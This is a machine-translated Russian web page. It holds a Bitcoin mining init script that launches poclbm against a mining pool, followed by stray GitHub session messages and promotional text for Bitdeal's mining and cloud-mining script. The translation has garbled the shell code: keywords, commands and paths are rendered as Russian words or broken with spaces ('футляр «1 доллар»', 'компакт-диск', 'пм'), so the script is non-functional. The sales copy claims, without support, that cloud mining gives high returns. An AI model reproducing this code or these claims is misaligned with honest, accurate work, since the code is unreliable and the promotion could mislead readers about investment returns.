# Используйте с осторожностью.
# Определить как запуск do:
# $ wget -O / etc / init.г / биткойн https://gist.github.com/
# chmod + x /etc/init.d/bitcoin
# update-rc.d биткойн по умолчанию
# Путь к скрипту майнинга poclbm
путь_poclbm = / путь / к / poclbm / dir /
# Данные пула
POOLUSER = имя пользователя @ mail.com
POOLPASS = пароль
POOLURL = pit.deepbit.net
POOLPORT = 8332
# Environment
BTCLOG = / var / log / bitcoin.log
BTCLOCK = / var / lock / bitcoinmining
футляр «1 доллар»
начало)
эхо $$> $ BTCLOCK
компакт-диск $ path_poclbm
питон poclbm-mod.py -d 0 -v -w 128 -f 60 -a 10 —user = $ POOLUSER —pass = $ POOLPASS -o $ POOLURL -p $ POOLPORT> $ BTCLOG &
;;
стоп)
, если [-r $ BTCLOCK]; затем
BTCPID = $ (cat $ BTCLOCK)
# Увеличить PID из-за его дочерней порожденной команды poclbm
((BTCPID ++))
убить $ BTCPID
пм $ BTCLOCK
выход 0
fi
;;
*)
echo «Использование: / etc / init.г / биткойн {start | stop} «
выход 1
;;
esac
выход 0

Вы не можете выполнить это действие в настоящее время.Вы вошли в систему с другой вкладкой или окном. Перезагрузите, чтобы обновить сеанс.
Вы вышли из системы на другой вкладке или в другом окне. Перезагрузите, чтобы обновить сеанс.

Сценарий для майнинга биткойнов и ПО для облачного майнинга

Сценарий майнинга биткойнов — Лучшее веб-решение для упрощения процесса добычи биткойнов и начала добычи биткойнов как бизнеса. Это скрипт / программное обеспечение, которое можно установить или развернуть на оборудовании / сервере, которое вы использовали для майнинга биткойнов.Основная функция этого приложения — разделить мощность на хэш-мощность (вычислительную мощность). Bitdeal предоставляет лучший скрипт для майнинга биткойнов, с помощью которого вы можете запустить свой собственный сайт для майнинга биткойнов.

Как заработать на скрипте майнинга биткойнов?

В целом, чтобы люди могли добывать биткойны тремя способами,

Тип 1: человек установят программное обеспечение в ЦП, и программное обеспечение будет запускаться при каждом включении системы. Примечательно, что такое программное обеспечение не даст вам удовлетворительных результатов и приведет к добыче небольшого количества биткойнов.

Тип 2: Добыча биткойнов путем установки специализированных майнинговых установок и специализированного оборудования для майнинга.
Но это будет стоить слишком дорого и потребует непрерывного электроснабжения

Тип 3: Облачный майнинг

Таким образом, люди могут добывать биткойны, связавшись с компаниями, занимающимися облачным майнингом. Будет возможность выбрать бюджет. Бюджет может варьироваться в зависимости от криптовалюты и хэш-мощности.
По сравнению с другими двумя способами.Облачный майнинг биткойнов считается лучшей альтернативой и приводит к высокой рентабельности инвестиций с точки зрения бизнеса.

Итак, поняв эту концепцию, стартапы по добыче биткойнов начали использовать скрипт добычи биткойнов для упрощения огромного процесса добычи

Скрипт майнинга биткойнов может работать двумя способами.

1. Он помогает вам создать пользовательский интерфейс (т.е. веб-сайт, на котором пользователь может отслеживать свой прогресс)

2. Он может быть реализован на оборудовании или на сервере для выполнения функций майнинга.

Bitdeal — скрипт майнинга биткойнов

Bitdeal, мы покрываем все грани криптовалютной индустрии, и майнинг является одним из заметных решений для бизнеса в сфере криптовалют.Мы предлагаем лучший скрипт для майнинга биткойнов (облачный майнинг), который оснащен расширенной панелью администратора и позволяет управлять сложными алгоритмами хеширования.